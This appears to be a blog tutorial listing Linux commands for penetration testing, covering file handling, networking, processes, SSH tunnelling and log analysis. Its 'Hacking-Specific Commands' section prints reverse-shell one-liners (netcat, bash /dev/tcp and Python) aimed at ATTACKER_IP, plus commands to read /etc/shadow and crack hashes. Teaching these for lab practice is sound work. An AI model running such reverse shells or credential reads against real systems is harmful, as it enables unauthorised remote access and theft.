Linux Commands Every Hacker Should Know

Linux is the operating system of cybersecurity. From Kali Linux to Ubuntu Server, the command line is where most security work happens. Whether you are scanning networks, analyzing packets, exploiting vulnerabilities, or managing servers, you need to be fluent in Linux commands.

This guide covers the essential Linux commands every hacker and cybersecurity professional should know, organized by category with practical examples.

File System Navigation

Navigating the Linux file system is the most fundamental skill. These commands are used constantly:

# Print current directory
pwd

# List files (detailed, hidden, human-readable sizes)
ls -lah

# Change directory
cd /etc
cd ..        # Go up one level
cd ~         # Go to home directory

# Show directory tree structure
tree -L 2

# Find files by name
find / -name "*.conf" 2>/dev/null
find / -name "passwd" -type f

# Locate files using database (faster than find)
locate shadow
updatedb     # Update the locate database

File Operations

# Read file contents
cat /etc/passwd
less /var/log/syslog    # Scrollable view
head -n 20 file.txt     # First 20 lines
tail -f /var/log/auth.log  # Follow log in real-time

# Copy, move, and delete
cp file.txt /tmp/backup.txt
mv old_name.txt new_name.txt
rm -rf directory/       # Remove directory recursively

# Create files and directories
touch newfile.txt
mkdir -p /path/to/nested/directory

# File permissions
chmod 755 script.sh     # rwxr-xr-x
chmod +x script.sh      # Make executable
chown root:root file    # Change owner

# Search inside files
grep -r "password" /etc/
grep -i "error" /var/log/syslog
grep -rn "admin" /var/www/html/

User and Permission Management

Understanding users and permissions is critical for both attacking and defending Linux systems:

# Current user info
whoami
id
groups

# List all users
cat /etc/passwd
cat /etc/shadow          # Password hashes (requires root)

# Switch users
su - root                # Switch to root
sudo command             # Run single command as root

# Find SUID binaries (privilege escalation vector)
find / -perm -4000 -type f 2>/dev/null

# Find world-writable files
find / -writable -type f 2>/dev/null

# Find files owned by a specific user
find / -user www-data -type f 2>/dev/null

# Check sudo privileges
sudo -l

SUID binaries and sudo misconfigurations are among the most common privilege escalation vectors. Always check these during a penetration test.

Networking Commands

Network commands are the bread and butter of ethical hacking:

# Show network interfaces and IP addresses
ip addr show
ifconfig                 # Legacy but still common

# Show routing table
ip route show
route -n

# Check open ports on local machine
ss -tulnp
netstat -tulnp           # Legacy alternative

# DNS lookup
nslookup example.com
dig example.com
host example.com

# Test connectivity
ping -c 4 target.com
traceroute target.com

# Download files
wget https://example.com/file.zip
curl -O https://example.com/file.zip
curl -s https://api.example.com/data | jq .

# Transfer files between machines
scp file.txt user@remote:/tmp/
python3 -m http.server 8080  # Quick file server

# Show active connections
ss -tp
netstat -antp

Process Management

# List running processes
ps aux
ps aux | grep apache

# Real-time process monitor
top
htop                     # Better interactive version

# Kill processes
kill PID
kill -9 PID              # Force kill
killall process_name

# Run in background
command &
nohup command &          # Survives terminal close

# List background jobs
jobs
fg %1                    # Bring job to foreground

# Find process using a port
lsof -i :80
fuser 80/tcp

Text Processing

Text processing commands are essential for parsing scan results, filtering logs, and manipulating data during engagements:

# Sort and deduplicate
sort wordlist.txt | uniq > clean_wordlist.txt
sort -u wordlist.txt     # Sort and unique in one step

# Count lines, words, characters
wc -l file.txt

# Extract columns
cut -d: -f1 /etc/passwd           # First field, colon delimiter
awk -F: '{print $1,$3}' /etc/passwd  # Username and UID

# Stream editing
sed 's/old/new/g' file.txt        # Replace text
sed -n '10,20p' file.txt          # Print lines 10-20

# Filter with patterns
grep -E "^root|^admin" /etc/passwd
awk '/error/ {print $0}' logfile

# Combine and chain commands
cat access.log | grep "POST" | awk '{print $1}' | sort | uniq -c | sort -rn | head -20

That last command is a classic one-liner: it extracts all IP addresses that sent POST requests from an access log, counts occurrences, and shows the top 20. This kind of command chaining is invaluable during log analysis.

Compression and Archives

# Tar archives
tar -czf archive.tar.gz directory/    # Create compressed archive
tar -xzf archive.tar.gz               # Extract
tar -xjf archive.tar.bz2              # Extract bz2

# Zip files
zip -r archive.zip directory/
unzip archive.zip

# Gzip
gzip file.txt
gunzip file.txt.gz

# Base64 encoding/decoding (useful for payloads)
echo "payload" | base64
echo "cGF5bG9hZA==" | base64 -d

Service and System Management

# Systemd service management
systemctl start apache2
systemctl stop ssh
systemctl status nginx
systemctl enable postgresql     # Start on boot

# System information
uname -a                        # Kernel version
cat /etc/os-release             # OS version
hostnamectl                     # Hostname info
df -h                           # Disk usage
free -h                         # Memory usage
uptime                          # System uptime

# Scheduled tasks (persistence check)
crontab -l                      # Current user cron jobs
cat /etc/crontab                # System cron jobs
ls -la /etc/cron.*              # Cron directories

# Check running services
systemctl list-units --type=service --state=running

SSH and Remote Access

# Connect to remote host
ssh [email protected]
ssh -p 2222 [email protected]     # Custom port
ssh -i key.pem [email protected]  # Using private key

# SSH tunneling (port forwarding)
ssh -L 8080:localhost:80 user@target    # Local forward
ssh -R 9090:localhost:22 user@attacker  # Reverse forward
ssh -D 1080 user@target                 # SOCKS proxy

# Generate SSH keys
ssh-keygen -t ed25519

# Copy SSH key to remote host
ssh-copy-id [email protected]

# SCP file transfer
scp file.txt user@target:/tmp/
scp -r directory/ user@target:/opt/

SSH tunneling is a critical skill for penetration testers. It allows you to pivot through compromised hosts and access internal network services that are not directly reachable.

Hacking-Specific Commands

These commands are frequently used during penetration tests and CTF challenges:

# Netcat — the Swiss army knife
nc -lvnp 4444                   # Start a listener
nc target 80                    # Connect to port
nc -e /bin/bash target 4444     # Reverse shell

# Reverse shells (common one-liners)
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Upgrade to interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Hash cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 0 hash.txt wordlist.txt    # MD5

# Encoding and hashing
echo -n "text" | md5sum
echo -n "text" | sha256sum
echo -n "text" | xxd               # Hex dump

# Network scanning with Nmap
nmap -sV -sC target.com           # Version + scripts
nmap -p- target.com               # All ports
nmap -sU target.com               # UDP scan

Log Analysis

# Important log locations
/var/log/syslog          # System log
/var/log/auth.log        # Authentication log
/var/log/apache2/        # Apache web server logs
/var/log/nginx/          # Nginx logs
/var/log/fail2ban.log    # Fail2ban log

# Analyze failed SSH logins
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn

# Watch logs in real-time
tail -f /var/log/auth.log

# Search compressed logs
zgrep "error" /var/log/syslog.*.gz

Quick Reference Table

TaskCommand
Find SUID binariesfind / -perm -4000 2>/dev/null
Check open portsss -tulnp
Read password hashescat /etc/shadow
Start a listenernc -lvnp 4444
Quick file serverpython3 -m http.server 8080
Check sudo privssudo -l
Find writable dirsfind / -writable -type d 2>/dev/null
Extract IPs from loggrep -oE ‘[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+’ log
Upgrade shellpython3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Download filewget URL -O output

How to Practice

  • Set up a home hacking lab and practice every command on real systems
  • Play OverTheWire Bandit — A free wargame that teaches Linux command-line basics through progressive challenges
  • Complete TryHackMe Linux rooms — Interactive challenges with guided walkthroughs
  • Read The Linux Command Line book — Free online, covers everything from basics to shell scripting
  • Write shell scripts — Automate repetitive tasks to reinforce your command knowledge

Final Thoughts

Mastering the Linux command line is non-negotiable in cybersecurity. Every tool, every scan, every exploit, and every post-exploitation task runs through the terminal. The commands in this guide will cover 90% of what you need for everyday ethical hacking work.

Start by memorizing the networking and file system commands, then gradually add text processing and hacking-specific commands to your toolkit. With consistent practice in your hacking lab, these commands will become second nature.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top